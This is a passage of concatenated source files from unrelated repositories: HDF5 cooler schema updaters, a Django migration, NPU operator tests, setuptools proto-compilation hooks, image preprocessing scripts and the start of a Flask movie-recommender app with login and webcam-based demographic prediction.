    def update_invert_weight_for_resolution(h5_data, res=None):
        """
        Access the bins table, find the weight columns (everything except the
        chrom/start/end coordinates), and invert each one in place.
        """
        found_weights = [val for val in h5_data if val not in ['chrom', 'start', 'end']]
        for weight in found_weights:
            h5_weight = h5_data[weight][:]
            h5_data[weight][:] = list(map(norm_convert, h5_weight))
        if res:
            print('... For resolution %s, inverted following weights: %s' % (res, found_weights))
        else:
            print('... Inverted following weights: %s' % found_weights)

    # Bug fix: open explicitly in read/write mode. h5py >= 3 defaults to
    # read-only when no mode is given, which would make the writes above fail.
    with h5py.File(writefile, 'r+') as h5_file:
        if 'resolutions' in h5_file:
            for res in h5_file['resolutions']:
                update_invert_weight_for_resolution(h5_file['resolutions'][res]['bins'], res=res)
        else:
            update_invert_weight_for_resolution(h5_file['bins'])
def update_cooler_schema_v3(writefile):
    """
    Add format-version and storage-mode attributes to given cooler

    Args:
        writefile: path to an existing cooler/mcool hdf5 file, modified in place.
    """
    # helper fxn
    def add_v3_attrs(h5_data, res=None):
        """Attach the cooler schema v3 attributes to one hdf5 group."""
        info = {
            'format-version': COOLER_FORMAT_VERSION,
            'storage-mode': 'symmetric-upper'
        }
        h5_data.attrs.update(info)
        if res:
            print('... For resolution %s, added format-version and storage-mode attributes' % res)
        else:
            print('... Added format-version and storage-mode attributes')

    # Bug fix: open explicitly in read/write mode. h5py >= 3 defaults to
    # read-only when no mode is given, which would make attrs.update fail.
    with h5py.File(writefile, 'r+') as h5_file:
        if 'resolutions' in h5_file:
            for res in h5_file['resolutions']:
                add_v3_attrs(h5_file['resolutions'][res], res=res)
        else:
            add_v3_attrs(h5_file)
def update_mcool_schema_v2(writefile):
    """
    Add format and format-version attributes to the base level of an mcool

    Args:
        writefile: path to an existing cooler/mcool hdf5 file, modified in place.
    """
    # Bug fix: open explicitly in read/write mode. h5py >= 3 defaults to
    # read-only when no mode is given, which would make attrs.update fail.
    with h5py.File(writefile, 'r+') as h5_file:
        # only run if it's an mcool and 'resolutions' exist
        if 'resolutions' in h5_file:
            mcool_info = {
                'format': MCOOL_FORMAT,
                'format-version': MCOOL_FORMAT_VERSION
            }
            h5_file.attrs.update(mcool_info)
            print('... Added format and format-version attributes for the mcool')
        else:
            print('... Not a multi-res file, so will not add mcool schema attributes')
| 2.1875 | 2 |
calc/migrations/0021_auto_20210712_1234.py | AlexGogev/Django-Kids-Math | 0 | 12757372 | <reponame>AlexGogev/Django-Kids-Math
# Generated by Django 3.1.12 on 2021-07-12 11:34
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: alters Adding.num1 to a nullable
    # IntegerField.
    dependencies = [
        ('calc', '0020_adding_num1'),
    ]
    operations = [
        migrations.AlterField(
            model_name='adding',
            name='num1',
            # NOTE(review): verbose_name=3 is an int, not a string — this looks
            # like an auto-generation artifact; confirm whether a text label
            # was intended before changing it.
            field=models.IntegerField(null=True, verbose_name=3),
        ),
    ]
| 2.1875 | 2 |
RandomCorrMat/RandomCorr.py | KikeM/RandomCorrMat | 0 | 12757373 | # ----------------------------------------------------
# Generate a random correlations
# ----------------------------------------------------
import numpy as np
def randCorr(size, lower=-1, upper=1):
    """Generate a random size x size correlation matrix.

    Draws a size x 1000 matrix from U(lower, upper), rescales each row to
    unit Euclidean length, and returns the Gram matrix of the rows with the
    diagonal forced to exactly 1. Off-diagonal entries therefore lie in
    [-1, 1].

    @param size: dimension of the correlation matrix
    @param lower: lower limit of the uniform distribution used to create the corr matrix
    @param upper: upper limit of the uniform distribution used to create the corr matrix
    @return: numpy ndarray, correlation matrix
    """
    n_samples = 1000
    raw = np.random.uniform(lower, upper, (size, n_samples))
    # Normalize each row onto the unit sphere: r / sqrt(r'r).
    row_lengths = np.sqrt((raw ** 2).sum(axis=1, keepdims=True))
    unit_rows = raw / row_lengths
    corr = unit_rows @ unit_rows.T
    corr[np.diag_indices(size)] = 1.
    return corr
| 3.578125 | 4 |
test/test_npu/test_network_ops/test_bitwise_not.py | Ascend/pytorch | 1 | 12757374 | # Copyright (c) 2020, Huawei Technologies.All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import sys
import copy
from common_utils import TestCase, run_tests
from common_device_type import dtypes, instantiate_device_type_tests
from util_test import create_common_tensor
class Test_Bitwise_Not(TestCase):
    """Checks torch.bitwise_not parity between the CPU and NPU backends."""

    def generate_data(self, min_d, max_d, shape, dtype):
        """Return a CPU tensor of `shape` drawn uniformly from [min_d, max_d)."""
        input1 = np.random.uniform(min_d, max_d, shape).astype(dtype)
        npu_input1 = torch.from_numpy(input1)
        return npu_input1

    def generate_bool_data(self, shape):
        """Return a random boolean CPU tensor of the given shape."""
        input1 = np.random.randint(0, 2, shape).astype(np.bool_)
        npu_input1 = torch.from_numpy(input1)
        return npu_input1

    def cpu_op_exec(self, input1):
        """Reference bitwise_not computed on the CPU, as a numpy array."""
        output = torch.bitwise_not(input1)
        if output.dtype not in [torch.int32, torch.int8, torch.bool]:
            # Normalize to int32 so both backends compare on the same dtype.
            output = output.to(torch.int32)
        output = output.numpy()
        return output

    def npu_op_exec(self, input1):
        """bitwise_not computed on the NPU device, as a numpy array."""
        input1 = input1.to("npu")
        output = torch.bitwise_not(input1)
        output = output.to("cpu")
        if output.dtype not in [torch.int32, torch.int8, torch.bool]:
            output = output.to(torch.int32)
        output = output.numpy()
        return output

    def npu_op_exec_out(self, input1, input2):
        """NPU bitwise_not written through the `out=` tensor argument."""
        input1 = input1.to("npu")
        input2 = input2.to("npu")
        torch.bitwise_not(input1, out = input2)
        output = input2.to("cpu")
        if output.dtype not in [torch.int32, torch.int8, torch.bool]:
            output = output.to(torch.int32)
        output = output.numpy()
        return output

    def test_bitwise_not_bool(self, device):
        npu_input1 = self.generate_bool_data((2, 3))
        cpu_output = self.cpu_op_exec(npu_input1)
        npu_output = self.npu_op_exec(npu_input1)
        self.assertRtolEqual(cpu_output, npu_output)

    def test_bitwise_not_int16(self, device):
        npu_input1 = self.generate_data(0, 2342, (2, 3), np.int16)
        cpu_output = self.cpu_op_exec(npu_input1)
        npu_output = self.npu_op_exec(npu_input1)
        self.assertRtolEqual(cpu_output, npu_output)

    def test_bitwise_not_int32(self, device):
        npu_input1 = self.generate_data(0, 34222, (2, 3), np.int32)
        cpu_output = self.cpu_op_exec(npu_input1)
        npu_output = self.npu_op_exec(npu_input1)
        self.assertRtolEqual(cpu_output, npu_output)

    def test_bitwise_not_int64(self, device):
        npu_input1 = self.generate_data(0, 355553, (2, 3), np.int64)
        cpu_output = self.cpu_op_exec(npu_input1)
        npu_output = self.npu_op_exec(npu_input1)
        self.assertRtolEqual(cpu_output, npu_output)

    def test_bitwise_not_out(self, device):
        # Each entry: [input spec, out-tensor spec] as (min, max, shape, dtype).
        shape_format = [
            [[0, 2342, [2, 3], np.int16], [0, 2342, [10, 20], np.int16]],
            [[0, 34222, [2, 3], np.int32], [0, 34222, [10, 20], np.int32]],
            [[0, 355553, [2, 3], np.int64], [0, 355553, [1, 1], np.int64]],
        ]
        for item in shape_format:
            npu_input1 = self.generate_data(item[0][0], item[0][1], item[0][2], item[0][3])
            npu_input2 = self.generate_data(item[1][0], item[1][1], item[1][2], item[1][3])
            cpu_output = self.cpu_op_exec(npu_input1)
            npu_output1 = self.npu_op_exec_out(npu_input1, npu_input1)
            npu_output2 = self.npu_op_exec_out(npu_input1, npu_input2)
            self.assertRtolEqual(cpu_output, npu_output1)
            # Bug fix: the second assertion previously re-checked npu_output1,
            # leaving the differently-shaped `out=` result unverified.
            self.assertRtolEqual(cpu_output, npu_output2)
# Register the test class for every device type except the plain CPU backend.
instantiate_device_type_tests(Test_Bitwise_Not, globals(), except_for='cpu')
if __name__ == "__main__":
    run_tests()
| 2.15625 | 2 |
ansys/tools/protoc_helper/_distutils_overrides.py | ansys/ansys-tools-protoc-helper | 0 | 12757375 | # type: ignore
# Type checking causes problems with the mixin approach used here. This
# could be overcome by subclassing '_CompileProtosMixin' from
# 'distutils.core.Command', but mypy *also* doesn't recognize that
# this class has a 'distribution' attribute. Overall, it's not worth
# the extra overhead.
"""Defines setuptools commands to execute the proto compilation.
Define commands which can be used in the setuptools ``cmdclass``
directive to override the default behavior, and compile the .proto
files before the command is executed.
"""
from setuptools.command.build_py import build_py
from setuptools.command.develop import develop
from ._compile_protos import compile_proto_files
__all__ = ["BuildPyCommand", "DevelopCommand", "CMDCLASS_OVERRIDE"]
class _CompileProtosMixin:
    """Mixin that compiles .proto files before running the wrapped command."""

    def run(self):
        """Compile protos into the root package directory, then delegate."""
        package_dirs = self.distribution.package_dir
        try:
            target_dir = package_dirs[""]
        except (KeyError, TypeError):
            # No package_dir mapping (None) or no "" entry: compile in place.
            target_dir = "."
        compile_proto_files(target_dir)
        super().run()
class BuildPyCommand(_CompileProtosMixin, build_py):
    """Command to compile .proto files while building the package wheel.

    Override for the ``build_py`` command which adds compilation of
    .proto files to Python source before the standard build runs.
    """
class DevelopCommand(_CompileProtosMixin, develop):
    """Command to compile .proto files during editable installs.

    Override for the ``develop`` command which adds compilation of
    .proto files to Python source before the editable install runs.
    """
# Drop-in mapping for setup(cmdclass=...) that wires up both overrides.
CMDCLASS_OVERRIDE = {"build_py": BuildPyCommand, "develop": DevelopCommand}
| 2 | 2 |
app/display_modules/ancestry/tests/test_module.py | MetaGenScope/metagenscope-server | 0 | 12757376 | <reponame>MetaGenScope/metagenscope-server<gh_stars>0
"""Test suite for Ancestry diplay module."""
from app.display_modules.display_module_base_test import BaseDisplayModuleTest
from app.display_modules.ancestry import AncestryDisplayModule
from app.samples.sample_models import Sample
from app.display_modules.ancestry.models import AncestryResult
from app.display_modules.ancestry.constants import MODULE_NAME, TOOL_MODULE_NAME
from app.display_modules.ancestry.tests.factory import AncestryFactory
from app.tool_results.ancestry.tests.factory import (
create_values,
create_ancestry
)
class TestAncestryModule(BaseDisplayModuleTest):
    """Test suite for Ancestry display module."""
    def test_get_ancestry(self):
        """Ensure getting a single Ancestry behaves correctly."""
        ancestry = AncestryFactory()
        self.generic_getter_test(ancestry, MODULE_NAME)
    def test_add_ancestry(self):
        """Ensure Ancestry model is created correctly."""
        # Two samples with randomized population values (see factory helpers).
        samples = {
            'sample_1': {'populations': create_values()},
            'sample_2': {'populations': create_values()},
        }
        ancestry_result = AncestryResult(samples=samples)
        self.generic_adder_test(ancestry_result, MODULE_NAME)
    def test_run_ancestry_sample(self):  # pylint: disable=invalid-name
        """Ensure Ancestry run_sample produces correct results."""
        kwargs = {
            TOOL_MODULE_NAME: create_ancestry(),
        }
        self.generic_run_sample_test(kwargs, AncestryDisplayModule)
    def test_run_ancestry_sample_group(self):  # pylint: disable=invalid-name
        """Ensure Ancestry run_sample_group produces correct results."""
        def create_sample(i):
            """Create unique sample for index i."""
            data = create_ancestry()
            args = {
                'name': f'Sample{i}',
                'metadata': {'foobar': f'baz{i}'},
                TOOL_MODULE_NAME: data,
            }
            return Sample(**args).save()
        self.generic_run_group_test(create_sample,
                                    AncestryDisplayModule)
| 1.9375 | 2 |
layer_rename.py | boris-fx/mocha-scripts | 6 | 12757377 | # BSD 3-Clause License
#
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import shiboken2
from PySide2.QtCore import *
from PySide2.QtGui import *
class LayerRenameDialog(QDialog):
    """Small dialog that renames every layer matching a given name."""

    def __init__(self, parent=None):
        QDialog.__init__(self, parent)
        self._widgets = dict()
        self.create_widgets()
        self.create_layout()
        self.create_connections()

    def create_widgets(self):
        """Create the two name fields and the OK/Cancel buttons."""
        self._widgets['old_name'] = QLineEdit(self)
        self._widgets['new_name'] = QLineEdit(self)
        self._widgets['ok'] = QPushButton("OK", self)
        self._widgets['cancel'] = QPushButton("Cancel", self)

    def create_layout(self):
        """Lay out the form on top of the OK/Cancel button row."""
        main_layout = QGridLayout(self)
        form_layout = QFormLayout(self)
        form_layout.addRow("Old name:", self._widgets['old_name'])
        form_layout.addRow("New name:", self._widgets['new_name'])
        main_layout.addLayout(form_layout, 0, 0, 3, 3)
        main_layout.addWidget(self._widgets['ok'], 3, 1)
        main_layout.addWidget(self._widgets['cancel'], 3, 2)
        self.setLayout(main_layout)

    def create_connections(self):
        self._widgets['ok'].clicked.connect(self.do_rename)
        self._widgets['cancel'].clicked.connect(self.reject)

    def do_rename(self):
        """Rename all layers matching the old name, then close the dialog."""
        # NOTE(review): get_current_project is not imported in this file —
        # confirm it is provided by the mocha scripting environment.
        proj = get_current_project()
        if not proj:
            self.reject()
            # Bug fix: previously fell through and kept executing after reject.
            return
        old_name = self._widgets['old_name'].text()
        new_name = self._widgets['new_name'].text()
        layers = proj.find_layers(old_name)
        if not layers:
            msg = QMessageBox(self)
            msg.setText("No layers with name %s" % old_name)
            msg.exec_()
            self.reject()
            # Bug fix: previously continued into the rename below after reject.
            return
        # Bug fix: map() is lazy in Python 3, so the original
        # map(lambda layer: setattr(...), layers) never executed.
        for layer in layers:
            layer.name = new_name
        self.accept()
if __name__ == "__main__":
    # Attach the dialog to Mocha's main window so it parents correctly.
    from mocha import ui
    mw = ui.get_widgets()['MainWindow']
    rename = LayerRenameDialog(parent=mw)
    rename.show()
| 1.242188 | 1 |
samples/redpen/pre_process.py | diaoxinqiang/Mask_RCNN | 1 | 12757378 | <reponame>diaoxinqiang/Mask_RCNN
import cv2
import numpy as np
import os
import glob
import json
def delete_file(image_path, annotations):
    """Delete *image_path* from disk unless its annotation key exists.

    The key is the file's basename concatenated with its size in bytes,
    matching the VIA annotation-file key scheme used elsewhere in this
    script.
    """
    base_name = os.path.basename(image_path)
    size_bytes = int(os.path.getsize(image_path))
    key = base_name + str(size_bytes)
    if key not in annotations:
        os.remove(image_path)
def save_json(path, data):
    """Serialize *data* as JSON and write it to the file at *path*."""
    with open(path, 'w') as out_file:
        json.dump(data, out_file)
def to_gray_image(path, img_dir_path):
    """Binarise and downscale the image at *path*, saving it under
    *img_dir_path* with the same file name.

    Despite the name this produces a black/white thresholded image, not a
    grayscale one: channel values above 180 become 255, the rest 0.  The
    result is scaled to one third of the original size in each dimension.
    """
    # Bug fix: the original referenced the undefined name ``image_path``
    # (copy/paste from ``delete_file``); the parameter here is ``path``.
    file_name = ''.join(os.path.splitext(os.path.basename(path)))
    # Read the image in colour.
    image = cv2.imread(path, flags=cv2.IMREAD_COLOR)
    _, threshold = cv2.threshold(image, 180, 255, cv2.THRESH_BINARY)
    threshold = cv2.resize(threshold, None, fx=0.33, fy=0.33, interpolation=cv2.INTER_LINEAR)
    cv2.imwrite(os.path.join(img_dir_path, file_name), threshold,
                )
    # Quality compression parameter: [int(cv2.IMWRITE_JPEG_QUALITY), 5]
def getPositions(x, y, change, max):
    """Generate a jittered sequence of (x, y) point positions between
    ``change`` and ``max`` along whichever axis equals ``change``.

    NOTE(review): if neither ``x`` nor ``y`` equals ``change`` this raises
    UnboundLocalError (``change1``/``change2`` unset) and, similarly, falls
    off the end returning ``None`` — callers apparently guarantee one of
    the two matches; confirm.  Also note ``max`` shadows the builtin.
    """
    if x == change:
        change1 = x
        change2 = y
    if y == change:
        change1 = y
        change2 = x
    positions1 = []
    positions2 = []
    # Random number of steps; the unit spacing covers (max - change).
    counts = np.random.randint(10, 20)
    unit = (max - change) / counts
    for i in range(counts):
        # Step along the varying axis with +/-10 pixel jitter.
        position1 = change1 + (i + 1) * unit + np.random.randint(-10, 10)
        if (position1 < max):
            positions1.append(int(position1))
            # Small positive jitter on the fixed axis.
            positions2.append(int(change2 + np.random.randint(1, 8)))
        else:
            break
    # Return (xs, ys) regardless of which axis varied.
    if x == change:
        return positions1, positions2
    if y == change:
        return positions2, positions1
def mergeJson():
    """Merge the per-directory ``via_region_data_*.json`` annotation files
    under ``./wrong_labels/`` into one ``via_region_data.json`` per
    directory.

    Side effects: deletes images that have no annotated regions, renames
    the remaining images to ``<dirname>_<filename>``, forces every region
    label to ``'wrong'`` and rewrites the merged annotation file keyed by
    ``<new_name><file_size>``.
    """
    img_dir_path = './wrong_labels/'
    paths = glob.glob(os.path.join(img_dir_path, '*'))
    # all_json ={}
    for path in paths:
        print(path)
        json_paths = glob.glob(os.path.join(path, 'via_region_data_*.json'))
        json_extend = {}
        for json_path in json_paths:
            annotations = json.load(open(json_path))
            for key, annotation in annotations.items():
                regions = annotation['regions']
                filename = annotation['filename']
                image_file_path = os.path.join(path, filename)
                if (len(regions) == 0):
                    # No labelled regions: the image is useless, remove it.
                    try:
                        if os.path.exists(image_file_path):
                            os.remove(image_file_path)
                            # del annotations[key]
                            print('删除文件:' + str(image_file_path))
                    except Exception as e:
                        print('文件删除失败:' + str(img_dir_path))
                else:
                    # Force a single class name on every region.
                    for region in regions:
                        region_attributes = region['region_attributes']
                        region_attributes['name'] = 'wrong'
                    # NOTE(review): path.split('/')[2] assumes the fixed
                    # './wrong_labels/<dir>' layout — confirm before reuse.
                    new_image_name = path.split('/')[2] + '_' + filename
                    annotation['filename'] = new_image_name
                    new_image_path = os.path.join(path, new_image_name)
                    if os.path.exists(image_file_path):
                        file_size = int(os.path.getsize(image_file_path))
                        os.rename(image_file_path, new_image_path)
                    if os.path.exists(new_image_path):
                        file_size = int(os.path.getsize(new_image_path))
                        annotation['size'] = file_size
                        json_extend[new_image_name + str(file_size)] = annotation
        # all_json.update(json_extend)
        # json_extend.update(annotations)26 27 12 32 30 + 28
        print(len(json_extend))
        save_json(os.path.join(path, 'via_region_data.json'),
                  json_extend)
def resize():
    """Shrink every annotated image of the ``./dataset/val`` split to 33%
    and write the results plus an adjusted ``via_region_data.json`` into
    ``./dataset/val_new``.

    Region polygon coordinates are scaled by the same 0.33 factor so the
    annotations stay aligned with the resized images.  The destination
    directory is assumed to exist.
    """
    img_dir_path = './dataset'
    img_type = 'val'
    img_new = img_type + '_new'
    json_path = os.path.join(img_dir_path, img_type, 'via_region_data.json')
    json_extend = {}
    annotations = json.load(open(json_path))
    for key, annotation in annotations.items():
        regions = annotation['regions']
        filename = annotation['filename']
        image_file_path = os.path.join(img_dir_path, img_type, filename)
        try:
            if os.path.exists(image_file_path):
                image = cv2.imread(image_file_path, flags=cv2.IMREAD_COLOR)
                image = cv2.resize(image, None, fx=0.33, fy=0.33, interpolation=cv2.INTER_LINEAR)
                resize_image_path = os.path.join(img_dir_path, img_new, filename)
                cv2.imwrite(resize_image_path, image)
                file_size = int(os.path.getsize(resize_image_path))
                # Scale the polygon vertices by the same factor as the image.
                for region in regions:
                    all_points_x = region['shape_attributes']['all_points_x']
                    all_points_y = region['shape_attributes']['all_points_y']
                    region['shape_attributes']['all_points_x'] = (
                        (np.asarray(all_points_x) * 0.33).astype(int)).tolist()
                    region['shape_attributes']['all_points_y'] = (
                        (np.asarray(all_points_y) * 0.33).astype(int)).tolist()
                annotation['size'] = file_size
                # Keys follow the VIA scheme: <filename><size-in-bytes>.
                json_extend[filename + str(file_size)] = annotation
        except Exception as e:
            print('error:' + str(e))
    print(len(json_extend))
    save_json(
        os.path.join(img_dir_path, img_new, 'via_region_data.json'),
        json_extend)
if __name__ == '__main__':
    # Script entry point: only the resize step runs by default; call
    # mergeJson() manually when merging annotation files instead.
    resize()
Movie Recommender System Based on User Demographics Prediction/App/app.py | Mohammed-Khaled1/ITI_AI-PRO_Graduation_Project | 0 | 12757379 | <gh_stars>0
###################### Importing Libraries ######################
from flask import Flask, g, redirect, render_template, request, session, url_for
from flask_mysqldb import MySQL
# from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail, Message
import emoji
import random
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import cv2
import time
import sys
import os
from keras.models import load_model
###########################################################################
# To make camera window active
# NOTE(review): macOS-only import-time side effect — shells out to
# AppleScript so the OpenCV camera window gets focus; it is a no-op
# failure on other platforms.
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "python" to true' ''')
###########################################################################
# User class for the users in the app
# class User:
# def __init__(self, id, username, password):
# self.id = id
# self.username = username
# self.password = password
# def __repr__(self):
# return f'<User: {self.username}>'
# users = []
# users.append(User(id=1, username='Kareem', password='<PASSWORD>'))
# users.append(User(id=2, username='Alex', password='<PASSWORD>'))
# users.append(User(3, 'Mike', 'xyz'))
# print(users)
###################### APP Creation & Configurations ######################
# Create an instance of Flask class for the web app
app = Flask(__name__)
# NOTE(review): secret key and mail credentials are hardcoded — move them
# to environment variables / config before deploying.
app.secret_key = 'secretKey1'
mail = Mail(app) # instantiate the mail class
# Configuring the web sql serverd
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = ''
app.config['MYSQL_DB'] = 'graduation_project'
mysql = MySQL(app)
# configuration of mail
app.config['MAIL_SERVER']='smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USERNAME'] = '<EMAIL>'
app.config['MAIL_PASSWORD'] = '<PASSWORD>'
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
# NOTE(review): Mail(app) is instantiated twice; this second binding is the
# one the routes use (it picks up the MAIL_* config set above).
mail = Mail(app)
###################### CONSTANT & GLOBAL VARIABLES ######################
# Keras models path
AGE_MODEL_PATH = "models/aaage_best_model_last6.h5"
ETHNICITY_MODEL_PATH = "models/Adagrad_test_ethnicity_model.h5"
GENDER_MODEL_PATH = "models/gender_best_model.h5"
# Photos Path
FACE_DETECTOR_PATH = 'static/haarcascade_frontalface_default.xml'
USER_PHOTO_PATH = "static/user_photos/"
GUEST_PHOTO_PATH = "static/guest_photos/"
#### Model Labels ####
# Age labels (model output classes, in prediction-index order)
AGE_LABELS = ['Under 25', '25-34', '35-44', '45-55', '55+']
# Representative single ages mapped 1:1 onto AGE_LABELS; used to match the
# ratings dataframe's bucketized_user_age column.
DF_AGE_LABELS = ['18', '25', '35', '45', '50', '56']
# Ethnicity labels
ETHNICITY_LABELS = ['American-European', 'African', 'Japanese', 'Indian', 'Latin']
# Gender labels
GENDER_LABELS = ['Male', 'Female']
# Movie Genres offered in the recommendation forms
MOVIE_GENRES = ['Action', 'Adventure', 'Animation', 'Children', 'Comedy', 'Crime', 'Documentary', 'Drama', 'Fantasy', 'Horror', 'Musical', 'Mystery', 'Romance', 'Sci-Fi', 'Thriller', 'War']
# OTP CODE (module-level mutable state shared by the forget-password flow)
OTP = ''
#########################################################################
# Get all App users
# def get_all_users():
# cur = mysql.connection.cursor()
# cur.execute("SElECT * FROM users_info")
# all_users = cur.fetchall()
# cur.close()
# return all_users
#######################################################
# g object is a global variable for one specific request.
# It is used to store data b\w different functions without passing them directly.
@app.before_request
def before_request():
    """Populate ``g.user`` with the current user's DB row before each
    request.

    The session key ``user_id`` normally holds the numeric id, but the
    forget-password flow stores the e-mail address instead — hence the
    fallback lookup by Email.  ``g.user`` stays ``None`` for anonymous
    visitors.
    """
    g.user = None
    if 'user_id' in session:
        # Get all users from database
        # cur = mysql.connection.cursor()
        # cur.execute("SElECT * FROM users_info")
        # all_users = cur.fetchall()
        # cur.close()
        # user = [user for user in users if user.id == session['user_id']][0]
        # # print('inside before request :', user)
        # g.user = user
        # all_users = get_all_users()
        # user = [user for user in all_users if user[0] == session['user_id']][0]
        # g.user = user
        ##################################### Other solution
        # print('################# inside before_request', file=sys.stderr)
        # print('type(session["user_id"]) =', type(session), file=sys.stderr)
        # print('session["user_id"] =', session['user_id'], file=sys.stderr)
        # print('session["user_id"][0]', session['user_id'][0], file=sys.stderr)
        # Get the user record from the database
        # NOTE(review): the bare excepts below swallow all DB errors, not
        # just "no such user".
        try:
            cur = mysql.connection.cursor()
            cur.execute("SELECT * FROM users_info WHERE id = %s", (str(session['user_id']),))
            user = cur.fetchall()[0]
            cur.close()
            # print('after query in before_request', file=sys.stderr)
            # print('type(user) =', type(user), file=sys.stderr)
            # print('user =', user, file=sys.stderr)
            # print('user[0] =', user[0], file=sys.stderr)
            g.user = user
        except:
            print('No users with this id', file=sys.stderr)
            try:
                cur = mysql.connection.cursor()
                cur.execute("SELECT * FROM users_info WHERE Email = %s", (str(session['user_id']),))
                user = cur.fetchall()[0]
                cur.close()
                # print('after query in before_request', file=sys.stderr)
                # print('type(user) =', type(user), file=sys.stderr)
                # print('user =', user, file=sys.stderr)
                # print('user[0] =', user[0], file=sys.stderr)
                g.user = user
            except:
                print('No users with this Email (Forget Password)', file=sys.stderr)
#######################################################
# the root page redirects to the login page
@app.route('/')
def mainPage():
    """Root URL handler: send every visitor to the login/sign-up page."""
    login_url = url_for('login_signup')
    return redirect(login_url)
# Login + Signup Page
@app.route('/login_signup', methods=['GET', 'POST'])
def login_signup():
    """Combined login/sign-up page.

    Login: looks up the user by e-mail and compares the password, then
    stores the user id in the session.  Sign-up: takes a webcam photo,
    predicts age/ethnicity/gender from it and inserts the new user.

    NOTE(review): passwords are stored and compared in plaintext — hash
    them (e.g. werkzeug.security) before any real deployment.
    """
    msg = ""
    confirmed = 1
    if request.method == 'POST':
        # Clear session
        session.pop('user_id', None)
        ##### Log in Page #####
        if "btn_login_submit" in request.form:
            # Login variables
            logEmail = request.form['logEmail']
            logPass = request.form['logPass']
            # if logEmail != '' and logPass != '':
            # Get all users from database
            # cur = mysql.connection.cursor()
            # cur.execute("SElECT * FROM users_info")
            # all_users = cur.fetchall()
            # cur.close()
            #####################################
            # all_users = get_all_users()
            # user = [user for user in all_users if user[3] == logEmail][0]
            # print('inside login function', user)
            # if user and user[4] == logPass:
            #     session['user_id'] = user[0]
            #     return redirect(url_for('profile'))
            # return redirect(url_for('login_signup'))
            #####################################
            ##################################### Other solution
            try:
                # Get the user record from the database
                cur = mysql.connection.cursor()
                cur.execute("SELECT * FROM users_info WHERE Email = %s", (logEmail,))
                curr_user = cur.fetchall()[0]
                cur.close()
                # print('################### inside login', file=sys.stderr)
                # print('type(curr_user) =', type(curr_user), file=sys.stderr)
                # print('curr_user =', curr_user, file=sys.stderr)
                # print('curr_user[0] =', curr_user[0], file=sys.stderr)
                # Check user password
                if curr_user[4] == logPass:
                    session['user_id'] = curr_user[0]
                    # print('################### inside try if password', file=sys.stderr)
                    # print('type(session["user_id"]) =', type(session['user_id']), file=sys.stderr)
                    # print('session["user_id"]', session['user_id'], file=sys.stderr)
                    # print('session["user_id"][0]', session['user_id'][0], file=sys.stderr)
                    return redirect(url_for('home'))
            except:
                # Unknown e-mail raises IndexError on fetchall()[0].
                msg = 'Incorrect Email or Password !!'
                # print('################### inside except', file=sys.stderr)
                # print(curr_user, file=sys.stderr)
            return render_template('login_signup.html', message=msg)
        ####################################################### end of Other solution
        ##### Sign up Page #####
        if "btn_reg_submit" in request.form:
            # Signup variables
            details = request.form
            regFirstName = details['regFirstName']
            regLastName = details['regLastName']
            regEmail = details['regEmail']
            regPass = details['regPass']
            regConfPass = details['regConfPass']
            # genre = details['genre']
            genre = 'Comedy' # Temporary
            # print('################### inside login', file=sys.stderr)
            # print('logEmail =', logEmail, file=sys.stderr)
            # print('logPass =', logPass, file=sys.stderr)
            ##############################
            # if regFirstName != '' and regLastName != '' and regEmail != '' and regPass != '' and regConfPass != '' and genre != '':
            # if password != <PASSWORD>:
            #     msg = "Password mismatch"
            #     return render_template('signup.html', dataToRender=msg)
            ##############################
            # Take a photo after clicking register button
            photo_path = USER_PHOTO_PATH + regFirstName + '_' + str(int(time.time())) + '_photo.jpg'
            # take_photo_timer(photo_path)
            # take_photo_detect_face(photo_path)
            take_photo_timer_detect_face(photo_path)
            # Predict age, gender & age for the user from the photo taken
            age = model_pred(AGE_MODEL_PATH, AGE_LABELS, photo_path)
            ethnicity = model_pred(ETHNICITY_MODEL_PATH, ETHNICITY_LABELS, photo_path)
            gender = model_pred(GENDER_MODEL_PATH, GENDER_LABELS, photo_path)
            ######################################################
            # Send OTP code
            # if request.method == 'POST':
            #     if request.form['send_code'] == 'Do Something':
            #         # Create OTP
            #         otp = str(random.randint(0, 999)).zfill(6)
            #         # Send verification code
            #         verify_mail(email, otp)
            # # Check user verification code
